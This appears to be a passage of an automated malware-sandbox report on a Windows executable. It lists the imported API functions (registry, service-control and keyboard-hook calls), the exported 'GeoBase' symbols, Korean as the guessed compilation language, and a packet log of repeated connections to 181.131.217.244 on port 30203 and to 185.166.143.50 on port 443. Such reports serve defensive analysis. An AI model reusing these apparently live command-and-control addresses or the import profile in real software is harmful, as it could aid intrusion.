GetCurrentThreadId, VirtualQuery, GetCurrentProcess, GlobalMemoryStatus, CreateFileA, ReadFile, MoveFileExA, DeleteFileA, SetUnhandledExceptionFilter, GetCurrentThread, GetThreadContext, GetSystemInfo, GetModuleHandleA, lstrcmpA, lstrlenA, lstrcmpiA, lstrcmpiW, GetStringTypeExA, GetStringTypeExW, lstrlenW, CompareStringA, CompareStringW, GetEnvironmentVariableA, MultiByteToWideChar, GetEnvironmentVariableW, GetVersion, DeleteTimerQueueTimer, lstrcpyA, LoadResource, LockResource, SizeofResource, FindResourceA, WideCharToMultiByte, GetThreadLocale, GetLocaleInfoA, GetACP, GetVersionExA, InterlockedExchange, RaiseException, WaitForSingleObject, CreateMutexA, GetLastError, CloseHandle, GetModuleFileNameA, ExitProcess, DeleteCriticalSection, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, GlobalHandle
                                                                                    USER32.dllBringWindowToTop, SetRectEmpty, CreatePopupMenu, InsertMenuItemA, LoadAcceleratorsA, LoadMenuA, ReuseDDElParam, UnpackDDElParam, IsClipboardFormatAvailable, MessageBeep, SetRect, GetTabbedTextExtentA, IsRectEmpty, UnionRect, GetDCEx, LockWindowUpdate, GetSystemMenu, SetParent, SetMenu, TranslateAcceleratorA, DestroyMenu, GetMenuItemInfoA, InflateRect, GetDialogBaseUnits, DestroyIcon, GetSysColorBrush, GetMenuStringA, AppendMenuA, RemoveMenu, InsertMenuA, DeleteMenu, WaitMessage, GetWindowThreadProcessId, ReleaseCapture, WindowFromPoint, SetCapture, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, ScrollWindowEx, IsDialogMessageA, IsDlgButtonChecked, SetDlgItemTextA, SetDlgItemInt, GetDlgItemTextA, GetDlgItemInt, CheckRadioButton, CheckDlgButton, RegisterWindowMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SendDlgItemMessageA, IsChild, GetWindowTextLengthA, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, GetMessageTime, GetMessagePos, MapWindowPoints, TrackPopupMenuEx, TrackPopupMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, GetMenu, GetSubMenu, GetMenuItemID, GetMenuItemCount, GetSysColor, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, GetClassInfoA, RegisterClassA, SetWindowPlacement, GetDlgCtrlID, SetWindowPos, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, PtInRect, GetWindow, MapVirtualKeyA, GetKeyNameTextA, CopyRect, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, IsWindow, GetDlgItem, GetNextDlgTabItem, UnhookWindowsHookEx, SetMenuItemBitmaps, GetFocus, ModifyMenuA, GetMenuState, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, ValidateRect, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, ShowOwnedPopups, SetCursor, MsgWaitForMultipleObjects, wvsprintfA, wsprintfA, GetParent, UnregisterClassA, CharUpperA, CharUpperW, CharLowerA, CharLowerW, EnableWindow, IsIconic, GetSystemMetrics, DrawIcon, EndDialog, GetAsyncKeyState, GetWindowTextA, CallWindowProcA, GetDC, ReleaseDC, GetClientRect, SetScrollInfo, GetScrollInfo, ScrollWindow, BeginPaint, EndPaint, SetWindowLongA, MoveWindow, SetFocus, DialogBoxParamA, PostMessageA, KillTimer, InvalidateRect, SendMessageA, SetTimer, DefWindowProcA, MessageBoxA, DestroyWindow, PostQuitMessage, CreateWindowExA, SetWindowTextA, ShowWindow, UpdateWindow, LoadIconA, LoadCursorA, RegisterClassExA, LoadStringA, GetMessageA, TranslateMessage, DispatchMessageA, GetCursorPos
                                                                                    GDI32.dllCopyMetaFileA, CreateDCA, GetTextExtentPoint32A, CreateFontIndirectA, SetRectRgn, CombineRgn, GetMapMode, DPtoLP, CreateCompatibleBitmap, GetCharWidthA, StretchDIBits, CreateFontA, StartPage, EndPage, SetAbortProc, AbortDoc, EndDoc, GetBkColor, CreateHatchBrush, GetObjectType, PlayMetaFileRecord, SelectPalette, GetStockObject, CreateCompatibleDC, CreatePatternBrush, CreateDIBPatternBrushPt, DeleteDC, ExtSelectClipRgn, PolyBezierTo, PolylineTo, PolyDraw, ArcTo, CreateSolidBrush, GetCurrentPositionEx, ExtCreatePen, CreatePen, GetDeviceCaps, ExtTextOutA, RectVisible, PtVisible, StartDocA, GetPixel, BitBlt, GetWindowExtEx, GetViewportExtEx, SelectClipPath, CreateRectRgn, GetClipRgn, SelectClipRgn, DeleteObject, SetColorAdjustment, SetArcDirection, SetMapperFlags, SetTextCharacterExtra, SetTextJustification, SetTextAlign, MoveToEx, LineTo, OffsetClipRgn, IntersectClipRect, ExcludeClipRect, SetMapMode, SetStretchBltMode, SetROP2, SetPolyFillMode, SetBkMode, RestoreDC, ScaleWindowExtEx, SetWindowExtEx, OffsetWindowOrgEx, SetWindowOrgEx, ScaleViewportExtEx, SaveDC, GetObjectA, SetBkColor, GetClipBox, GetDCOrgEx, PatBlt, CreateRectRgnIndirect, CreateBitmap, SetTextColor, TextOutA, EnumMetaFile, GetTextMetricsA, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, PlayMetaFile
                                                                                    comdlg32.dllReplaceTextA, FindTextA, PageSetupDlgA, GetOpenFileNameA, CommDlgExtendedError, GetSaveFileNameA, GetFileTitleA, PrintDlgA
                                                                                    WINSPOOL.DRVGetJobA, DocumentPropertiesA, OpenPrinterA, ClosePrinter
                                                                                    ADVAPI32.dllStartServiceA, RegCloseKey, RegQueryValueExA, RegSetValueExA, RegDeleteValueA, RegDeleteKeyA, RegCreateKeyExA, RegOpenKeyExA, StartServiceCtrlDispatcherA, OpenSCManagerA, CloseServiceHandle, GetFileSecurityA, SetFileSecurityA, RegCreateKeyA, RegSetValueA, RegQueryValueA, RegOpenKeyA, RegEnumKeyA, SetServiceStatus, RegisterServiceCtrlHandlerA, ControlService, GetUserNameA, QueryServiceStatus, QueryServiceConfigA, QueryServiceConfig2A, LockServiceDatabase, ChangeServiceConfigA, ChangeServiceConfig2A, UnlockServiceDatabase, QueryServiceLockStatusA, OpenServiceA, DeleteService, CreateServiceA
                                                                                    SHELL32.dllExtractIconA, SHGetFileInfoA, DragFinish, DragQueryFileA
                                                                                    COMCTL32.dllImageList_Read, ImageList_Write, ImageList_Destroy, ImageList_Create, ImageList_LoadImageA, ImageList_Merge, ImageList_Draw, ImageList_GetImageInfo
                                                                                    SHLWAPI.dllHashData, PathFindExtensionA, PathRemoveExtensionA, PathStripToRootA, PathIsUNCA, PathFindFileNameA, PathRemoveFileSpecA
                                                                                    ole32.dllWriteFmtUserTypeStg, SetConvertStg, WriteClassStg, OleRegGetUserType, ReadClassStg, StringFromCLSID, CoTreatAsClass, CoTaskMemFree, CreateBindCtx, CoTaskMemAlloc, ReleaseStgMedium, OleDuplicateData, CoDisconnectObject, CoCreateInstance, StringFromGUID2, CLSIDFromString, ReadFmtUserTypeStg
                                                                                    OLEAUT32.dllVariantClear, VariantChangeType, VariantInit, SysAllocStringLen, SysStringLen, SysAllocStringByteLen, SysStringByteLen, VarBstrFromDate, VarBstrFromCy, VarCyFromStr, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SysFreeString, SafeArrayGetElemsize, SafeArrayGetDim, SafeArrayCreate, SafeArrayRedim, VariantCopy, SafeArrayAllocData, SafeArrayAllocDescriptor, SafeArrayCopy, SafeArrayGetElement, SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayLock, SafeArrayUnlock, SafeArrayDestroy, SafeArrayDestroyData, SafeArrayDestroyDescriptor, VariantTimeToSystemTime, SystemTimeToVariantTime, SysAllocString, SysReAllocStringLen, VarDateFromStr, VarBstrFromDec, VarDecFromStr, SafeArrayGetLBound
                                                                                    WSOCK32.dllgetsockopt, shutdown
                                                                                    NameOrdinalAddress
                                                                                    ??0CSingleLock@GeoBase@@QAE@PAVCSyncObject@1@H@Z10x466ff0
                                                                                    ??1CSingleLock@GeoBase@@QAE@XZ20x401030
                                                                                    ??4CSingleLock@GeoBase@@QAEAAV01@ABV01@@Z30x401000
                                                                                    ?IsLocked@CSingleLock@GeoBase@@QAEHXZ40x401050
                                                                                    ?Lock@CSingleLock@GeoBase@@QAEHK@Z50x467030
                                                                                    ?Unlock@CSingleLock@GeoBase@@QAEHJPAJ@Z60x4670a0
                                                                                    ?Unlock@CSingleLock@GeoBase@@QAEHXZ70x467060
                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    KoreanNorth Korea
                                                                                    KoreanSouth Korea
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 12, 2024 17:30:06.364259958 CET4978030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:06.484396935 CET3020349780181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:06.484483957 CET4978030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:06.527700901 CET4978030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:06.647680044 CET3020349780181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:06.647758007 CET4978030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:06.767869949 CET3020349780181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:08.051817894 CET3020349780181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:08.127787113 CET4978030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:08.287240982 CET3020349780181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:08.310127974 CET4978030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:08.430715084 CET3020349780181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:08.430809975 CET4978030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:08.607311010 CET49788443192.168.2.5185.166.143.50
                                                                                    Dec 12, 2024 17:30:08.607376099 CET44349788185.166.143.50192.168.2.5
                                                                                    Dec 12, 2024 17:30:08.607595921 CET49788443192.168.2.5185.166.143.50
                                                                                    Dec 12, 2024 17:30:08.811284065 CET49788443192.168.2.5185.166.143.50
                                                                                    Dec 12, 2024 17:30:08.811333895 CET44349788185.166.143.50192.168.2.5
                                                                                    Dec 12, 2024 17:30:10.208400965 CET44349788185.166.143.50192.168.2.5
                                                                                    Dec 12, 2024 17:30:10.208487034 CET49788443192.168.2.5185.166.143.50
                                                                                    Dec 12, 2024 17:30:10.218580961 CET49788443192.168.2.5185.166.143.50
                                                                                    Dec 12, 2024 17:30:10.218610048 CET44349788185.166.143.50192.168.2.5
                                                                                    Dec 12, 2024 17:30:10.218921900 CET44349788185.166.143.50192.168.2.5
                                                                                    Dec 12, 2024 17:30:10.269433022 CET49788443192.168.2.5185.166.143.50
                                                                                    Dec 12, 2024 17:30:10.378515005 CET49788443192.168.2.5185.166.143.50
                                                                                    Dec 12, 2024 17:30:10.423336983 CET44349788185.166.143.50192.168.2.5
                                                                                    Dec 12, 2024 17:30:10.943872929 CET44349788185.166.143.50192.168.2.5
                                                                                    Dec 12, 2024 17:30:10.943942070 CET44349788185.166.143.50192.168.2.5
                                                                                    Dec 12, 2024 17:30:10.943967104 CET49788443192.168.2.5185.166.143.50
                                                                                    Dec 12, 2024 17:30:10.944000006 CET44349788185.166.143.50192.168.2.5
                                                                                    Dec 12, 2024 17:30:10.944014072 CET49788443192.168.2.5185.166.143.50
                                                                                    Dec 12, 2024 17:30:10.944106102 CET44349788185.166.143.50192.168.2.5
                                                                                    Dec 12, 2024 17:30:10.944175959 CET49788443192.168.2.5185.166.143.50
                                                                                    Dec 12, 2024 17:30:10.971117973 CET49788443192.168.2.5185.166.143.50
                                                                                    Dec 12, 2024 17:30:11.097798109 CET4979430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:11.217633963 CET3020349794181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:11.217715025 CET4979430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:11.218486071 CET4979430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:11.338366032 CET3020349794181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:11.338429928 CET4979430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:11.458343029 CET3020349794181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:12.537904978 CET3020349794181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:12.538377047 CET4979430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:12.539586067 CET4979430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:12.659357071 CET3020349794181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:12.674401045 CET4979930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:12.794570923 CET3020349799181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:12.794830084 CET4979930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:12.808485031 CET4979930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:12.928738117 CET3020349799181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:12.928849936 CET4979930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:13.049146891 CET3020349799181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:14.974222898 CET3020349799181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:14.974304914 CET4979930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:14.974490881 CET4979930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:15.082840919 CET4980530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:15.094199896 CET3020349799181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:15.202864885 CET3020349805181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:15.202972889 CET4980530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:15.203977108 CET4980530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:15.324045897 CET3020349805181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:15.324110031 CET4980530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:15.443941116 CET3020349805181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:17.380295992 CET3020349805181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:17.380383015 CET4980530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:17.380517960 CET4980530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:17.488461971 CET4981130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:17.500303984 CET3020349805181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:17.608330011 CET3020349811181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:17.609292984 CET4981130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:17.609292984 CET4981130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:17.729285002 CET3020349811181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:17.729798079 CET4981130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:17.849555969 CET3020349811181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:18.922615051 CET3020349811181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:18.922688961 CET4981130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:18.922823906 CET4981130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:19.035233974 CET4981430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:19.044358015 CET3020349811181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:19.155091047 CET3020349814181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:19.155170918 CET4981430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:19.155880928 CET4981430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:19.275577068 CET3020349814181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:19.275660038 CET4981430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:19.395436049 CET3020349814181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:20.727884054 CET3020349814181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:20.728239059 CET4981430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:20.728421926 CET4981430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:20.832173109 CET4982030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:20.848225117 CET3020349814181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:20.951940060 CET3020349820181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:20.952085018 CET4982030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:20.952781916 CET4982030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:21.072588921 CET3020349820181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:21.076265097 CET4982030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:21.195940018 CET3020349820181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:22.270795107 CET3020349820181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:22.270935059 CET4982030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:22.271097898 CET4982030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:22.378623962 CET4982530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:22.390830994 CET3020349820181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:22.498408079 CET3020349825181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:22.498507977 CET4982530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:22.499378920 CET4982530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:22.620183945 CET3020349825181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:22.621874094 CET4982530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:22.741811991 CET3020349825181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:23.844517946 CET3020349825181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:23.844594002 CET4982530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:23.844765902 CET4982530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:23.960722923 CET4983130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:23.964559078 CET3020349825181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:24.080679893 CET3020349831181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:24.080773115 CET4983130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:24.081669092 CET4983130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:24.201495886 CET3020349831181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:24.201564074 CET4983130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:24.321517944 CET3020349831181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:25.402345896 CET3020349831181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:25.402482986 CET4983130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:25.402635098 CET4983130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:25.522339106 CET3020349831181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:25.525177002 CET4983530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:25.645505905 CET3020349835181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:25.645611048 CET4983530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:25.646758080 CET4983530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:25.766493082 CET3020349835181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:25.768244028 CET4983530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:25.888026953 CET3020349835181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:27.043762922 CET3020349835181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:27.043910027 CET4983530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:27.044068098 CET4983530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:27.159967899 CET4984130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:27.163753986 CET3020349835181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:27.279827118 CET3020349841181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:27.279913902 CET4984130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:27.280772924 CET4984130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:27.400438070 CET3020349841181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:27.400491953 CET4984130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:27.520195007 CET3020349841181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:29.133002996 CET3020349841181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:29.133554935 CET4984130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:29.133733034 CET4984130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:29.238270998 CET4984530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:29.253402948 CET3020349841181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:29.358155012 CET3020349845181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:29.358314037 CET4984530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:29.358961105 CET4984530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:29.479048967 CET3020349845181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:29.480290890 CET4984530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:29.600039005 CET3020349845181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:30.687026024 CET3020349845181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:30.687350988 CET4984530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:30.687351942 CET4984530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:30.800611973 CET4985030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:30.807550907 CET3020349845181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:30.920548916 CET3020349850181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:30.923434973 CET4985030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:30.924391031 CET4985030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:31.044117928 CET3020349850181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:31.045664072 CET4985030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:31.166121960 CET3020349850181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:32.245796919 CET3020349850181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:32.248270988 CET4985030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:32.248598099 CET4985030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:32.363091946 CET4985430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:32.368479967 CET3020349850181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:32.482924938 CET3020349854181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:32.483056068 CET4985430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:32.483707905 CET4985430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:32.603451967 CET3020349854181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:32.604190111 CET4985430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:32.724054098 CET3020349854181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:33.830100060 CET3020349854181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:33.830219984 CET4985430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:33.830725908 CET4985430203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:33.942089081 CET4985830203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:33.950531960 CET3020349854181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:34.061933994 CET3020349858181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:34.062694073 CET4985830203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:34.063256979 CET4985830203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:34.182980061 CET3020349858181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:34.183119059 CET4985830203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:34.302882910 CET3020349858181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:35.385746002 CET3020349858181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:35.388299942 CET4985830203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:35.389183998 CET4985830203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:35.505829096 CET4986530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:35.508910894 CET3020349858181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:35.625797033 CET3020349865181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:35.628334045 CET4986530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:35.645056963 CET4986530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:35.764831066 CET3020349865181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:35.768279076 CET4986530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:35.888246059 CET3020349865181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:36.927871943 CET3020349865181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:36.927932024 CET4986530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:36.928112984 CET4986530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:37.035072088 CET4986930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:37.047943115 CET3020349865181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:37.305172920 CET3020349869181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:37.305313110 CET4986930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:37.305989027 CET4986930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:37.425818920 CET3020349869181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:37.425869942 CET4986930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:37.546217918 CET3020349869181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:38.650067091 CET3020349869181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:38.650532007 CET4986930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:38.657617092 CET4986930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:38.777445078 CET3020349869181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:38.815470934 CET4987330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:38.935723066 CET3020349873181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:38.935812950 CET4987330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:38.956192970 CET4987330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:39.075963974 CET3020349873181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:39.076097965 CET4987330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:39.196147919 CET3020349873181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:40.261878014 CET3020349873181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:40.264308929 CET4987330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:40.264550924 CET4987330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:40.378952980 CET4987830203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:30:40.384238005 CET3020349873181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:30:40.499974012 CET3020349878181.131.217.244192.168.2.5
